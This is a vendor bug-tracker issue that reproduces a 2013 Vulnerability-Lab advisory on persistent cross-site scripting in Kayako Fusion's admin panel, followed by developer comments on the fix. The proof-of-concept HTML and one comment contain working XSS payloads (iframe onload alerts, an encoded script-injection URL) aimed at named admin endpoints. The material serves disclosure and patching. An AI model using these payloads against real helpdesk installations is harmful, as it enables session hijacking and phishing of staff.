Details

    • Type: Bug Bug
    • Status: Resolved
    • Priority: Important Important
    • Resolution: Fixed and Tested
    • Affects Version/s: 4.53.2633
    • Fix Version/s: 4.54
    • Component/s: Code and framework
    • Labels:
      None

      Description

      Title:
      ======
      Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities

      Date:
      =====
      2013-01-06

      References:
      ===========
      http://www.vulnerability-lab.com/get_content.php?id=824

      VL-ID:
      =====
      824

      Common Vulnerability Scoring System:
      ====================================
      4.1

      Introduction:
      =============
      Kayako Fusion is the world`s leading multi-channel helpdesk solution that enables organizations to deliver a
      better customer experience and work more effectively as a team, whatever their size. Whether over email, support
      tickets, self-help, live chat or voice, your customers support history is tracked in one place and can be
      accessed from anywhere. Proven, powerful and accessible support tools without the expense or rocket science.

      (Copy of the Vendor Homepage: http://www.kayako.com/products/fusion/ )

      Abstract:
      =========
      The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the Kayako Fusion v4.51.1891 Application.

      Report-Timeline:
      ================
      2013-01-04: Researcher Notification & Coordination
      2013-00-00: Vendor Notification
      2013-00-00: Vendor Response/Feedback
      2013-00-00: Vendor Fix/Patch
      2013-00-00: Public Disclosure

      Status:
      ========
      Unpublished

      Affected Products:
      ==================
      Kayako
      Product: Fusion - CMS 4.51.1891

      Exploitation-Technique:
      =======================
      Remote

      Severity:
      =========
      Medium

      Details:
      ========
      Multiple persistent input validation vulnerabilities are detected in the Kayako Fusion v4.51.1891 Web Application.
      The vulnerability typus allows an attacker to inject own malicious script code in the vulnerable module on application side (persistent).

      The first vulnerability is located in the Tickets section when processing to request via the the `Escalation` module the bound
      vulnerable add_tags & remove_tags application parameters. The persistent injected script code will be executed directly out of
      the `add` section when processing to edit the earlier inserted dbms context.

      The secound vulnerability is located in the Base section when processing to request via the `Manage` module the bound vulnerable
      `CustomFieldGroup > eMail` application listing. The persistent injected script code will be executed directly out of the `usergroup`
      listing when processing to manage the earlier inserted dbms context.

      The third vulnerability is located in the Live-Chat section when processing to request via the `Manage` module the bound vulnerable
      `Visitor Group Title` application listing. The persistent injected script code will be executed directly out of the `Visitor Group`
      listing when processing to manage the earlier inserted dbms context.

      The 4th vulnerability is located in the LanguagePhrase section when processing to request via the `Manage` module the bound vulnerable
      `search query` (string) application listing. The persistent injected script code will be executed directly out of the `Search Query`
      listing when processing to manage the earlier inserted dbms context.

      The 5th vulnerability is located in the Staff section when processing to request via the `Manage or Insert` module the bound vulnerable
      `staff name or staff group` application parameters. The persistent injected script code will be executed directly out of the `Staff`- or
      `Staff Edit` listing when processing to manage the earlier inserted dbms context.

      The vulnerabilities can be exploited with a privileged application user account and low or medium required user interaction.
      Successful exploitation of the vulnerability result in persistent session hijacking, persistent phishing, external redirect, external malware
      loads and persistent vulnerable module context manipulation.

      Vulnerable Section(s):
      [+] Tickets
      [+] Base
      [+] Live-Chat
      [+] LanguagePhrase
      [+] Staff

      Vulnerable Module(s):
      [+] Escalation/Insert - (Tickets)
      [+] CustomFieldGroup/Manage - (Base)
      [+] Staff/Insert & /Staff/Edit/1 - (Base)
      [+] StaffGroup/Insert - (Base)
      [+] LiveChat/Group/Manage - (Live-Chat)
      [+] Manage/0 - Search - (LanguagePhrase)

      Vulnerable Parameter(s):
      [+] Add tags & remove tags
      [+] eMail User - Listing (Profile All Sections)
      [+] Visitor Group Title & Group Color
      [+] Search Query

      Proof of Concept:
      =================
      The persistent inut validation vulnerabilities can be exploited by restricted low or medium privileged application user account with low
      required user interaction. For demonstration or reproduce ...

      Review: Add tags & remove tags

      <tr class="tablerow1_tr"><td class="tablerow1" align="left" valign="top" width="50%"><span class="tabletitle">Add Tags</span>
      </td><td class="tablerow1" align="left" valign="top"><div class="swifttextautocompletediv" style="BACKGROUND: #FFFFFF URL
      (http://rem0ve.kayako.com/__swift/themes/__cp/images/icon_taginput.gif) NO-REPEAT 4px 5px;"><ul class="swifttextautocomplete"
      jsonurl="/Base/Tags/QuickSearch" id="tagcontainer_addtags"><li class="swifttextautocompleteinputcontainer swifttextautocompleteitem"
      tagid="><[PERSISTENT INJECTED SCRIPT CODE!] <><[PERSISTENT INJECTED SCRIPT CODE!] <<div class="swifttextautocompleteitemclose">
      <img src="http://rem0ve.kayako.com/_swift/themes/_cp/images/icon_tagx.gif" align="absmiddle" border="0" /></div><input type="hidden"
      name="containertaginput_addtags[]" value="><[PERSISTENT INJECTED SCRIPT CODE!] <" ></[PERSISTENT INJECTED SCRIPT CODE!]></li>
      <li class="swifttextautocompleteinputcontainer"><input class="swifttextautocompleteinput ac_input" name="taginput_addtags"
      id="taginput_addtags" value="Start typing to insert tags..." autocomplete="off" size="30" type="text"></li></ul></div><script type="text/javascript">
      if (window.$UIObject) { window.$UIObject.Queue(function()

      Unknown macro: { UITagControl('addtags', '') }

      ); }</script></td></tr>
      <tr class="tablerow1_tr"><td class="tablerow1" align="left" valign="top" width="50%"><span class="tabletitle">Remove Tags</span></td>
      <td class="tablerow1" align="left" valign="top"><div class="swifttextautocompletediv" style="BACKGROUND: #FFFFFF URL
      (http://rem0ve.kayako.com/__swift/themes/__cp/images/icon_taginput.gif) NO-REPEAT 4px 5px;"><ul class="swifttextautocomplete"
      jsonurl="/Base/Tags/QuickSearch" id="tagcontainer_removetags"><li class="swifttextautocompleteinputcontainer swifttextautocompleteitem"
      tagid="><iframe src=a onload=alertVL <">><iframe src="a" onload="alertVL" <<div="" class="swifttextautocompleteitemclose">
      <img src="http://rem0ve.kayako.com/_swift/themes/_cp/images/icon_tagx.gif" align="absmiddle" border="0" /></div><input type="hidden"
      name="containertaginput_removetags[]" value="><iframe src=a onload=alertVL <" ></iframe></li><li class="swifttextautocompleteinputcontainer">
      <input class="swifttextautocompleteinput ac_input" name="taginput_removetags" id="taginput_removetags" value="Start typing to insert tags..."
      autocomplete="off" size="30" type="text"></li></ul></div><script type="text/javascript">if (window.$UIObject) { window.$UIObject.Queue(function()

      Unknown macro: { UITagControl('removetags', '') }

      ); }</script></td></tr>
      </tbody>

      Reference(s):
      http://rem0ve.kayako.com/admin/Tickets/Escalation/Insert
      http://rem0ve.kayako.com/admin/Base/CustomFieldGroup/Manage

      Review: Staff/Insert & /Staff/Edit/1 & StaffGroup/Insert

      <tbody><tr class="tablerow1_tr"><td class="tablerow1" align="left" valign="top" width="50%">​​​​​
      <span class="tabletitle">Group Title</span></td>
      <td class="tablerow1" align="left" valign="top"><input autocomplete="OFF" class="swifttext"
      name="title" id="title"
      value="<iframe src=a>%20%20%20%20"><iframe src=a onload=alert("VL") <" size="30" type="text">
      </td></tr>
      <tr class="tablerow1_tr">
      <td class="tablerow1" align="left" valign="top" width="50%"><span class="tabletitle">Group Type</span><br><span class="tabledescription">
      Custom fields must belong to a <b>custom field group</b>, which is further bound to an area of the product, such as ticket creation, live chat,
      user, user group etc.</span></td><td class="tablerow1" align="left" valign="top"><span class="tabledescription">User</span></td></tr>

      <tr class="tablerow1_tr"><td class="tablerow1" align="left" valign="top" width="50%"><span class="tabletitle">Visibility</span><br>
      <span class="tabledescription">Specify the custom field group visibility, private groups are not visible to users within the client support
      center.</span></td><td class="tablerow1" align="left" valign="top"><label for="publicvisibilitytype"><input autocomplete="OFF" name="visibilitytype"
      class="swiftradio" id="publicvisibilitytype" value="1" checked="" type="radio"> Public</label>
      <label for="privatevisibilitytype">
      <input autocomplete="OFF" name="visibilitytype" id="privatevisibilitytype" value="0" type="radio"> Private</label>
      </td></tr>

      <tr class="tablerow1_tr"><td class="tablerow1" align="left" valign="top" width="50%"><span class="tabletitle">
      Display Order</span><br>
      <span class="tabledescription">If there are multiple groups within an area, they are sorted using the display order (ascending) specified here.
      </span></td><td class="tablerow1" align="left" valign="top">​​​​​<input autocomplete="OFF"
      class="swifttextnumeric" name="displayorder" id="displayorder" value="1" size="10" type="text">
      </td></tr>
      </tbody>

      Reference(s):
      http://rem0ve.kayako.com/admin/Base/Staff/Insert
      http://rem0ve.kayako.com/admin/Base/StaffGroup/Insert
      http://rem0ve.kayako.com/admin/Base/Staff/Edit/1

      Review: CustomFieldGroup

      <tbody><tr>
      <td colspan="2" id="staffnavbar" valign="top">
      <div id="cpmenu" style="height: 100%;"><div style="display: none;" id="customnavhtmlcontainer"></div><div id="" class="dialogcontainer">
      <div class="dialogok"></div><div class="dialogokcontainer"><div class="dialogtitle">Inserted Custom Field Group "
      <[PERSISTENT INJECTED SCRIPT CODE!]>%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <"</div><div class="dialogtext">
      Successfully inserted custom field group "<b><iframe src=a>%20%20%20%20"><iframe src=a onload=alert("VL") <</b>" into the
      database.<br><b>Title:</b> <[PERSISTENT INJECTED SCRIPT CODE!]") <<br><b>Type:</b> User<br><b>Display Order:</b>
      1<[PERSISTENT INJECTED SCRIPT CODE!]>%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <</div></div></div>
      <div id="gridcontentcustomfieldgroupgrid"><form name="form_customfieldgroupgrid" id="form_customfieldgroupgrid"
      action="http://rem0ve.kayako.com/admin/Base/CustomFieldGroup/Manage//" method="post" onsubmit="javascript: return false;">
      <input autocomplete="OFF" name="csrfhash" value="z2hvplh1kar0dm8rzvwmln0ilddeunsc" type="hidden"><div id="widthwrapper" style="width: 100%;">
      <div id="gridtoolbar"><div class="gridtoolbarnew" id="gridextendedtoolbar"><div class="gridtoolbarsub">
      <ul><li><a href="http://rem0ve.kayako.com/admin/Base/CustomFieldGroup/Insert" viewport="1"><img src="Manage-Dateien/icon_addplus.gif"
      align="absmiddle" border="0"> New</a></li></ul></div></div>

      Reference(s):
      http://rem0ve.kayako.com/admin/Base/CustomFieldGroup/Manage

      Review: Live-Chat - Visitor Group Title

      <div id="" class="dialogcontainer"><div class="dialogok"></div><div class="dialogokcontainer"><div class="dialogtitle">
      Inserted Visitor Group "<[PERSISTENT INJECTED SCRIPT CODE!]>%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <"</div>

      ... or

      div class="ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfix"><span id="ui-dialog-title-window_editgroup"
      class="ui-dialog-title"><img src="http://rem0ve.kayako.com/_swift/themes/_cp/images/icon_window.gif" align="absmiddle"
      border="0"> Edit Visitor Group: <[PERSISTENT INJECTED SCRIPT CODE!]>%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <
      <[PERSISTENT INJECTED SCRIPT CODE!]></span>

      Reference(s):
      http://rem0ve.kayako.com/admin/LiveChat/Group/Manage

      Risk:
      =====
      The security risk of the persistent input validation web vulnerabilities are estimated as medium.

      Credits:
      ========
      Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

      Disclaimer:
      ===========
      The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
      either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
      Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
      profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
      states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
      may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
      or trade with fraud/stolen material.

      Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
      Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
      Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
      Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
      Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

      Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
      Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
      media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
      other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
      modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

      Copyright © 2012 | Vulnerability Laboratory

        Activity

        Hide
        Jamie Edwards added a comment -

        @Rajat Why don't we just convert to entities? It's about display, not cleaning, isn't it?

        Show
        Jamie Edwards added a comment - @Rajat Why don't we just convert to entities? It's about display, not cleaning, isn't it?
        Hide
        Mahesh Salaria added a comment -

        Cleanup fixes, tested and PULL request for master at https://github.com/kayakoinc/SWIFT/pull/80

        Show
        Mahesh Salaria added a comment - Cleanup fixes, tested and PULL request for master at https://github.com/kayakoinc/SWIFT/pull/80
        Hide
        Simaranjit Singh added a comment -

        Found one more bug. Passing URL arguments can easily inject javascript

        example:

        /admin/index.php?/Base/StaffGroup/Edit/11=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28395895%29%3C%2Fscript%3E&_=1357745421189
        

        It can be replicated edit part

        Sample screenshot:
        https://dl.dropbox.com/u/40112513/xssfusion.jpg

        Show
        Simaranjit Singh added a comment - Found one more bug. Passing URL arguments can easily inject javascript example: /admin/index.php?/Base/StaffGroup/Edit/11=%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28395895%29%3C%2Fscript%3E&_=1357745421189 It can be replicated edit part Sample screenshot: https://dl.dropbox.com/u/40112513/xssfusion.jpg

          People

          • Assignee:
            Simaranjit Singh
            Reporter:
            Jamie Edwards
          • Votes:
            0 Vote for this issue
            Watchers:
            4 Start watching this issue

            Dates

            • Created:
              Updated:
              Resolved: